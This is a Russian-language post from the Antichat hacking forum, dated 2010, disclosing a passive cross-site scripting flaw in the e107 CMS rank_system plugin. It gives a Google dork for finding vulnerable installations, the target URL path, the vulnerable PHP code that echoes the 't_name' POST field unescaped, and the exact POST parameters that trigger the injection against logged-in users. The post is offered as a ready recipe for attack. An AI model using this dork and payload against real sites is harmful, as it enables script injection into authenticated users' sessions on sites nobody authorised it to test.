06.05.2010, 01:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
гугл- inurl:e107_plugins/rank_system/recommend.php
target: http://[host]/[path]/e107_plugins/rank_system/recommend.php
passive XSS
/e107_plugins/rank_system/recommend.php
PHP код:
...$recomm = new recommend();
if (isset($_POST['nextstep']) )
{
$recomm_action = $_POST['recomm_action'];
} else {
$recomm_action = "";
}...
PHP код:
....else if ($recomm_action == 'submit') {
$type = intval($_POST['recomm_type']);
$target = intval($_POST['recomm_target']);
$t_name = $_POST['t_name'];
$r_for = intval($_POST['recomm_for']);
$r_remarks = $tp->toDB($_POST['recomm_remarks']);
if ($recomm->submitRecomm($target, $type, $r_for, $r_remarks)) {
$msg = RANKS_RM_11;
} else {
$msg = RANKS_RM_12;
}
$rank_text .= '
<table class="rsborder" style="' . USER_WIDTH . '">
<tr>
<td class="rscaption" style="text-align:left">' . RANKS_RM_01 . ' [' . $t_name .']</td>...
Результат (установить постом!):
nextstep = любое зн.
recomm_action=submit
t_name= xss
ps
сработает тока у авторизированого!
Последний раз редактировалось Strilo4ka; 06.05.2010 в 01:55..
|
|
|